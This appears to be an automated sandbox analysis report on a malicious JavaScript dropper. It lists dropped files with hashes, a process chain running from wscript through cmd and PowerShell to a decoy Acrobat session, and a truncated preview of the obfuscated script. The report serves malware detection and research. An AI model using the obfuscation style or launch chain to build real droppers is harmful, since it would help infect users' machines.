SHA-256: | EAC80CFF34EABDF80B1C6D8789883ABD86EDAC932F96817F8CDFC2CB8D1A09DD |
SHA-512: | AF6942E0217EE3ED03699A5651F50E8F7041DF4926826A3EA774635FC618F6695AFA0177DCB07B00BD1FFB76426605DF6CDFDBCEDC4E7E36543F8783EFAF4643 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.290740585105719 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJf21rPeUkwRe9:YvXKXsM3N810ctG+16Ukee9 |
MD5: | 4C56B3B6600B63BC326757A1A90CA4C1 |
SHA1: | 9EA38EF08F734A59775EB312EE0225157F94140A |
SHA-256: | 404161C9D87C2CD2C8654950D0CD3612FCBF059BB07D576E9B7D170DD17563FA |
SHA-512: | 129FC28C1E8A94DB5DDD1ECE4F6EC0D6E82AC67428082B3996DFD8D2A3B5E77C09FA1316ED1522E030AA75AD3A1E342670F8FCDD28E90326E02A32999BE33974 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.663429508275673 |
Encrypted: | false |
SSDEEP: | 24:Yv6XsMdqZOamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BStn:YvTMd/BgkDMUJUAh8cvMt |
MD5: | FD13F992A491EF33A8004249D3F0C5CE |
SHA1: | 9AEDC70AC2DE7851FF3A4B54F28A2D3C2F18227E |
SHA-256: | 32C7842AB96113AE0514457742CAD07D98614FB7476240C6F8EFA5A08F713751 |
SHA-512: | DDB66F08982B1CC1757088C4D747A571AD3C0216F280BF238A67142D55FAC80C6A3D3302A3CF575279BBB726D8327434C940F51ACA0DD7B2E4F79251FF5E1A84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.269542590945846 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfshHHrPeUkwRe9:YvXKXsM3N810ctGUUUkee9 |
MD5: | BA2B32A432666BC2FA12923B50FCF262 |
SHA1: | BCF9231214936589A74520750FBEAF5DCB756BBC |
SHA-256: | 00F33E5010374F497AA0E44CC01197643E177338B5D85042C67AB654269C06D0 |
SHA-512: | CBCA483649C094F0CAA5C314DFA6A3549B4921114E328AB8A23047EC9AF8764E1B89E48FD787776CB8A7E7FAA6FA55E763EE3951B62679B742A0C37E1190E8CE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.2715711615712175 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJTqgFCrPeUkwRe9:YvXKXsM3N810ctGTq16Ukee9 |
MD5: | 2DFF96816DB36FEDDB57B68D42417DA6 |
SHA1: | A58343DD5943BC8F9991FF174308808C4D744B34 |
SHA-256: | 73721EA12B1629B4683FA4D5A0E71C0C29A1D7FB6360E9EF774E89FA5E9B1A5B |
SHA-512: | 07AABAB25E7376F7A666B7C2F0FF4067E39B513FA4A5F5A8E1BFB7E671AD782E7D173746D212DB333EDD6FF30E304DEE15F621BB818F0F59B16920903BB209FC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.142257609671131 |
Encrypted: | false |
SSDEEP: | 24:Y5VhaHay1kTUJo2n43PYJvvsGw7jnqSj0SJfop2Sqi2LSLCBoiPqJ1MYWia5Ds9Q:YbUq24QJHIX2LhZNiPqJ1MJ69Q |
MD5: | 1E81490A11FCCFD862B8842EB20E9212 |
SHA1: | 78F84949E39088E3891355AFB50B4E3439E0332A |
SHA-256: | 1204863D207C0D0FCD9F69C7A63F90F9671CEC3D7A2F09FDFF6CCC15FDFE66C4 |
SHA-512: | 0D376F92AE8EC5DDD5886578ACD6F43687C30FBFFF4828C555F3BC36266FF985367F296B028CB8FA0138885082E2382BBA20DAA5A2CEC716877F58DC956D6BEF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1454521061920122 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursURZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHz:TFl2GL7ms2Xc+XcGNFlRYIX2v3kz |
MD5: | D06869734AB265C53D493768447FF4E7 |
SHA1: | 8616BF1FF1D75B8D3454C6984AC0B8F317C19072 |
SHA-256: | 2B99A613B2F5BD5BF51090C482F02886B7AEA0278E298E8C558B33A146CE8898 |
SHA-512: | C1F009BA15C4A54BF7613CBF5567BC70AB8E14206C247F2C01E360EA696021E10139D2D83AEAFC27A12DEE4D587555F64F47013A319470AFD2FB689EC3916A57 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5516082273330098 |
Encrypted: | false |
SSDEEP: | 24:7+tqUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxMqLxx/XYKQm:7MDXc+XcGNFlRYIX2vZqVl2GL7msl |
MD5: | 5644CBF6DB24735E376401F2D6EA01B0 |
SHA1: | 65EDAEADFC67C2FC7B41606F7294F0E086A08253 |
SHA-256: | 33F3156598F7CE241F83CC86D65F2B5FDDEDCC3AB74EF30D70FA1B94C99EE8FF |
SHA-512: | F96E9E9AC91BDF32544E2AE85E61540C2C5D369432E6D4688C6C8BDD63B2E08E8CC158359393C264827EA8574B51855D2E8B108237AACC02C1F85221EA6AEE4E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgOaMWu6wWdrno+9TUXzTWEo+rEuuYyu:6a6TZ44ADEOWrnr9TIzTWwrEuuK |
MD5: | 9FEE4D71B07B9E99A6DEF9AAF8CD6E3A |
SHA1: | 6BECE40C8691E077DB81184684D20E006F9C83B2 |
SHA-256: | E86BA95BE2AAFC20AF3BA15C37BDE12D22646FB0A744F334AA544C0DAC6E0E63 |
SHA-512: | 03DB7CAF2F073E3E00A1CE908BD0B508C7EA207D91F9643DE3D3759A8DA05B3B1A93B7DCF0DF238A5F9CC448E99620F772BBEAF0A2BA3605EEDAED804A9D12C1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5085442896850614 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEalH:Qw946cPbiOxDlbYnuRK+bDa9 |
MD5: | C319963B8742AAB3C06B13575DC8D39B |
SHA1: | 7166261D8471AD3B4E7B749FC13B75E9983CFE78 |
SHA-256: | 54E99B69BDCBEC5EC221859D5D4EE0D03C67C623E784F847C259F1B87ACEC483 |
SHA-512: | 741BF48165F7DA3452DA88A30A8B5610CA2B0140821BBD346BE006CC3442A9591C55D6DB9874653088157ED2204624EC0EEE276C9EEE563A6356EE728EC0FF53 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 11-52-37-976.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.347279217086089 |
Encrypted: | false |
SSDEEP: | 384:y3Fxnx6xfxBxIxvdxwxnxlmImGmpMiMWM4MM939T9m9pSbzSJkSSzM9G9W9Ixyxd:y1Vs9rStdadj5jkvhHR9J4zSGk9I4UOo |
MD5: | 45710A83A6278DC56D21466FA7722D6A |
SHA1: | F74893CAF4B1A02CF3B44FC33E7877D8B92E710C |
SHA-256: | 063D777A257AE2A690DBE47CDEE3C351FC2B647355ED5D8B75290F2E391F6EC2 |
SHA-512: | 52659964478A31109DBFDD50921E8ED16E9A30187ABE4F6AFB8145C85C4CEDB93ECAE23B867A542D0734E7F51BAB6BF62CC4DF219480E29A75F3180904403A9B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.398141032389365 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbwBcbAIXlcb9:V3fOCIdJDeK8Xm |
MD5: | 558DA3328B60A305632476A79EDA28FA |
SHA1: | D3A85C991CBB349A579D9A89C4F267867E9CDCDB |
SHA-256: | C4E6CE1FC8FA5069AB1BA8C7A75F15E61A249CAB3881122FCE008F4A8202E68A |
SHA-512: | 16057CCDC9FB48A3EF0FC0CEF1CB8694235A26B44C0A9725B0E68602BAE1390735B993FCA7B74217B55F416C3439591634A601D11314A9DAC5B20B31DC2B70E7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/nZwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG/WLxYGZN3mlind9i4ufFXpAXkru |
MD5: | 1F3D69524A9D7E17BD2363C81D130F1A |
SHA1: | C2A4A08839CBA47BEE2B601975F7C4F0CC191091 |
SHA-256: | D0FFBEC8502A0BE88A99F6708987658FEBE4CF3B6B79AF219C53EFF6458F9D9D |
SHA-512: | A4CBE7073A7CB4C5E33E1CD903CCD7F24B78A04C037BFA1D90D9A5BBD12AF60E3DFFD6546277D1B765CA1DAC1CDA28D24D3454C81952B72D97CAF84DF395E99A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.945764992564168 |
TrID: | |
File name: | 238395810148579476.js |
File size: | 20'375 bytes |
MD5: | 55d9b04976b4afd855ff6e3852d65e73 |
SHA1: | f70f99e8c191739a3038f5290eef4a357d84d4d9 |
SHA256: | 8e90c0077ef70a0ab1191443bb79ab06966c242740925a57165ef1a93bbbf000 |
SHA512: | e98401166516a3bcd7dd4c8fb30e5f9f5ce2502b696b7554c83a513962d411674e6c235ab5a6f84283a518bfa747d8247534be93bdc18044ee5a9f6ef54f6510 |
SSDEEP: | 384:6YwtE9Up4S3Ue0wr9wtE8Jyv+bh44euaeuJWiUttGjHd2KH5kYXn3XeKsBut26ol:6YwtE9Q4OUe0q9wtE8Jyv+bh44euaeuC |
TLSH: | 9D925348D84353839EDCA97209851CFB3B84670D2A254A8B2E5324CADFCB758E9D35FD |
File Content Preview: | function vvlxoh(){hzgdntu=[1031,3079,5127,4103,2055,3072];var uarftsrpl=this[uuchosdul+sxrdajgm+qgdud+vxhnafqpj+caqrpsjw+lcbwitmgw+tkgyznuw+oacsxvhsl](this[iucftqylr+vspifeei+jpugwkkeu+qgdud+nmlhecz+uuchosdul+oacsxvhsl][epmxyorx+qgdud+caqrpsjw+sxrdajgm+oa |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 11:52:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3c60000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 11:52:29 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6981b0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:52:29 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 11:52:29 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 11:52:34 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 11:52:34 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6981b0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 11:52:34 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff669380000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 11:52:35 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 11:52:36 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 11:52:36 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function vvlxoh() { |
|
1 | hzgdntu = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
